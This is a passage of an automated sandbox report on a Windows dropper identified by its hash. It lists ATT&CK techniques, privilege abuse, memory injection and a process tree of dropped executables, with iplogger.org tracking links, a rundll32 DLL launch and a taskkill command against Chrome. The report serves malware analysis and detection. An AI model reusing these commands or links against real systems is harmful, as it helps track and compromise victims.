Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5224 schtasks.exe
3404 schtasks.exe
944 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5508 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1160 tasklist.exe
6336 tasklist.exe

pid	process
5224	schtasks.exe
3404	schtasks.exe
944	schtasks.exe

pid	process
5508	timeout.exe

pid	process
1160	tasklist.exe
6336	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1072 taskkill.exe
5336 taskkill.exe
1924 taskkill.exe

pid	process
1072	taskkill.exe
5336	taskkill.exe
1924	taskkill.exe

Modifies registry class 5 IoCs

Processes:

msedge.exeFolder.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Folder.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exemsedge.exemsedge.exejfiag3g_gg.exe

pid	process
1252	pub2.exe
1252	pub2.exe
1828	msedge.exe
1828	msedge.exe
1848	msedge.exe
1848	msedge.exe
3032
3032
3032
3032
3032
3032
3032
3032
5060	jfiag3g_gg.exe
5060	jfiag3g_gg.exe
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032
3032

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

pub2.exeLxjwaytgkwrfchptbandzip.exe

pid process

1252 pub2.exe
6912 Lxjwaytgkwrfchptbandzip.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

1848 msedge.exe
1848 msedge.exe
1848 msedge.exe
1848 msedge.exe
1848 msedge.exe

pid	process
1848	msedge.exe
1848	msedge.exe
1848	msedge.exe
1848	msedge.exe
1848	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

KRSetp.exeInstallation.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	5004	KRSetp.exe
Token: SeCreateTokenPrivilege	4932	Installation.exe
Token: SeAssignPrimaryTokenPrivilege	4932	Installation.exe
Token: SeLockMemoryPrivilege	4932	Installation.exe
Token: SeIncreaseQuotaPrivilege	4932	Installation.exe
Token: SeMachineAccountPrivilege	4932	Installation.exe
Token: SeTcbPrivilege	4932	Installation.exe
Token: SeSecurityPrivilege	4932	Installation.exe
Token: SeTakeOwnershipPrivilege	4932	Installation.exe
Token: SeLoadDriverPrivilege	4932	Installation.exe
Token: SeSystemProfilePrivilege	4932	Installation.exe
Token: SeSystemtimePrivilege	4932	Installation.exe
Token: SeProfSingleProcessPrivilege	4932	Installation.exe
Token: SeIncBasePriorityPrivilege	4932	Installation.exe
Token: SeCreatePagefilePrivilege	4932	Installation.exe
Token: SeCreatePermanentPrivilege	4932	Installation.exe
Token: SeBackupPrivilege	4932	Installation.exe
Token: SeRestorePrivilege	4932	Installation.exe
Token: SeShutdownPrivilege	4932	Installation.exe
Token: SeDebugPrivilege	4932	Installation.exe
Token: SeAuditPrivilege	4932	Installation.exe
Token: SeSystemEnvironmentPrivilege	4932	Installation.exe
Token: SeChangeNotifyPrivilege	4932	Installation.exe
Token: SeRemoteShutdownPrivilege	4932	Installation.exe
Token: SeUndockPrivilege	4932	Installation.exe
Token: SeSyncAgentPrivilege	4932	Installation.exe
Token: SeEnableDelegationPrivilege	4932	Installation.exe
Token: SeManageVolumePrivilege	4932	Installation.exe
Token: SeImpersonatePrivilege	4932	Installation.exe
Token: SeCreateGlobalPrivilege	4932	Installation.exe
Token: 31	4932	Installation.exe
Token: 32	4932	Installation.exe
Token: 33	4932	Installation.exe
Token: 34	4932	Installation.exe
Token: 35	4932	Installation.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032
Token: SeShutdownPrivilege	3032
Token: SeCreatePagefilePrivilege	3032

Suspicious use of FindShellTrayWindow 40 IoCs

Processes:

File.exemsedge.exeAccostarmi.exe.pif

pid	process
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1848	msedge.exe
1964	File.exe
1964	File.exe
1848	msedge.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
3032
1848	msedge.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
3032
3032
3032
3032
3032
3032
224	Accostarmi.exe.pif
3032
3032
224	Accostarmi.exe.pif
224	Accostarmi.exe.pif
3032
3032
3032
3032
3032
3032

Suspicious use of SendNotifyMessage 22 IoCs

Processes:

File.exeAccostarmi.exe.pif

pid	process
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
1964	File.exe
224	Accostarmi.exe.pif
224	Accostarmi.exe.pif
224	Accostarmi.exe.pif

Suspicious use of SetWindowsHookEx 27 IoCs

Processes:

Info.exeLuC7opz56ZHv9DMKAzniWXla.exeGzkt5mHpxF1v1F6ko7n6Ojln.exe8yNuAlksxt9ERCQBLnTf5R7s.exe3C5chxgmdIM7FCOvWctXQCVO.exepowershell.EXEQwtjZdfAu0PgtINFi4Nvj66n.exeOXTwCzYYERQoTolMsvuosWem.exeHxMqtYZIUVTsFBvCoEA3Pki_.exek3wOXzGlwzQprfZ7dKwqK6sN.exezhD7lRTUvJmwo8erfpdnVTWv.exethSjL5N0VAxIgAXhHP6f09aM.exefind.exeAMmh7Hp1kuB7JaUBXLLtucDo.exePGrgYrmjIUuPTUnxq9jnhp_9.exez63VCPkRi8gB3YlO5uw17UaM.exe4E1sEd5y60BTJLCX9pPJHvn6.exeAppLaunch.exeInstall.exezhD7lRTUvJmwo8erfpdnVTWv.exeInstall.exedada.exedada.exebuild.exebuild.exebkkimcju.exeAccostarmi.exe.pif

pid	process
4708	Info.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5252	Gzkt5mHpxF1v1F6ko7n6Ojln.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5408	3C5chxgmdIM7FCOvWctXQCVO.exe
5308	powershell.EXE
5600	QwtjZdfAu0PgtINFi4Nvj66n.exe
5704	OXTwCzYYERQoTolMsvuosWem.exe
5512	HxMqtYZIUVTsFBvCoEA3Pki_.exe
5688	k3wOXzGlwzQprfZ7dKwqK6sN.exe
5672	zhD7lRTUvJmwo8erfpdnVTWv.exe
5548	thSjL5N0VAxIgAXhHP6f09aM.exe
5532	find.exe
5648	AMmh7Hp1kuB7JaUBXLLtucDo.exe
5520	PGrgYrmjIUuPTUnxq9jnhp_9.exe
5720	z63VCPkRi8gB3YlO5uw17UaM.exe
5680	4E1sEd5y60BTJLCX9pPJHvn6.exe
6380	AppLaunch.exe
6264	Install.exe
6400	zhD7lRTUvJmwo8erfpdnVTWv.exe
5188	Install.exe
6140	dada.exe
5832	dada.exe
2328	build.exe
2456	build.exe
5208	bkkimcju.exe
224	Accostarmi.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exeFiles.exemsedge.exepzyh.exeInstallation.exe

description	pid	process	target process
PID 1852 wrote to memory of 2556	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Files.exe
PID 1852 wrote to memory of 2556	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Files.exe
PID 1852 wrote to memory of 2556	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Files.exe
PID 1852 wrote to memory of 3320	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Install.exe
PID 1852 wrote to memory of 3320	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Install.exe
PID 1852 wrote to memory of 3320	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Install.exe
PID 1852 wrote to memory of 5004	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	KRSetp.exe
PID 1852 wrote to memory of 5004	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	KRSetp.exe
PID 1852 wrote to memory of 4468	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	jg3_3uag.exe
PID 1852 wrote to memory of 4468	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	jg3_3uag.exe
PID 1852 wrote to memory of 4468	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	jg3_3uag.exe
PID 2556 wrote to memory of 1964	2556	Files.exe	File.exe
PID 2556 wrote to memory of 1964	2556	Files.exe	File.exe
PID 2556 wrote to memory of 1964	2556	Files.exe	File.exe
PID 1852 wrote to memory of 1848	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	msedge.exe
PID 1852 wrote to memory of 1848	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	msedge.exe
PID 1848 wrote to memory of 1404	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 1404	1848	msedge.exe	msedge.exe
PID 1852 wrote to memory of 1880	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Folder.exe
PID 1852 wrote to memory of 1880	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Folder.exe
PID 1852 wrote to memory of 1880	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Folder.exe
PID 1852 wrote to memory of 4932	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Installation.exe
PID 1852 wrote to memory of 4932	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Installation.exe
PID 1852 wrote to memory of 4932	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Installation.exe
PID 1852 wrote to memory of 4864	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	pzyh.exe
PID 1852 wrote to memory of 4864	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	pzyh.exe
PID 1852 wrote to memory of 4864	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	pzyh.exe
PID 1852 wrote to memory of 1252	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	pub2.exe
PID 1852 wrote to memory of 1252	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	pub2.exe
PID 1852 wrote to memory of 1252	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	pub2.exe
PID 1852 wrote to memory of 4708	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Info.exe
PID 1852 wrote to memory of 4708	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Info.exe
PID 1852 wrote to memory of 4708	1852	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe	Info.exe
PID 4864 wrote to memory of 3364	4864	pzyh.exe	jfiag3g_gg.exe
PID 4864 wrote to memory of 3364	4864	pzyh.exe	jfiag3g_gg.exe
PID 4864 wrote to memory of 3364	4864	pzyh.exe	jfiag3g_gg.exe
PID 4932 wrote to memory of 4152	4932	Installation.exe	cmd.exe
PID 4932 wrote to memory of 4152	4932	Installation.exe	cmd.exe
PID 4932 wrote to memory of 4152	4932	Installation.exe	cmd.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe
PID 1848 wrote to memory of 4588	1848	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
"C:\Users\Admin\AppData\Local\Temp\7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1852

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2556

C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji7
3⤵
PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63fa46f8,0x7ffe63fa4708,0x7ffe63fa4718
4⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
PID:3320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 624
3⤵
- Program crash
PID:2920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 644
3⤵
- Program crash
PID:1568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 652
3⤵
- Program crash
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 748
3⤵
- Program crash
PID:3316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 820
3⤵
- Program crash
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 1020
3⤵
- Program crash
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 1036
3⤵
- Program crash
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 1356
3⤵
- Program crash
PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 632
3⤵
- Program crash
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 1852
3⤵
- Program crash
PID:7140

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63fa46f8,0x7ffe63fa4708,0x7ffe63fa4718
3⤵
PID:1404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
3⤵
PID:4588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
3⤵
PID:3528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
3⤵
PID:1124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
3⤵
PID:1244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5288 /prefetch:8
3⤵
PID:3932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
3⤵
PID:2820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
3⤵
PID:844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
3⤵
PID:4664

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:8
3⤵
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:4488

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x1fc,0x234,0x7ff621275460,0x7ff621275470,0x7ff621275480
4⤵
PID:3656

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:8
3⤵
PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3424 /prefetch:2
3⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:1880

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
3⤵
- Loads dropped DLL
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 608
4⤵
- Program crash
PID:944

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4932

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:4152

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Users\Admin\AppData\Local\Temp\pzyh.exe
"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
